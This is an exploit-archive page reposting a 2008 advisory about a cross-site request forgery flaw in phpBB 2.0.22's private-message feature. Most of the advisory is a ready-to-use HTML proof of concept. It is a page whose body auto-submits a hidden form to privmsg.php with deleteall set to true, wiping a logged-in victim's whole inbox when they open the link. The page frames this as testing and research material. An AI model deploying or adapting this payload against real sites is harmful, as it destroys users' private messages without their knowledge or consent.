Advertisement






phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

CVE Category Price Severity
CWE-352 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2008-02-05
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008010083

Below is a copy:

################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability               
by NBBN                        Type: Cross-Site Request Forgery
Founded: December 2007                                         
################################################################

An attacker can send a link via pm to a site with the follow html code to a 
victim and all victim's pm's are going to be deleted when he click the link. 
######Code##########################################################
 
<html>
  <head>
  </head>
  <body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" 
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
#####################################################################

######Vuln Versions:#####################

I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.

(Sorry my bad english :-) )



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum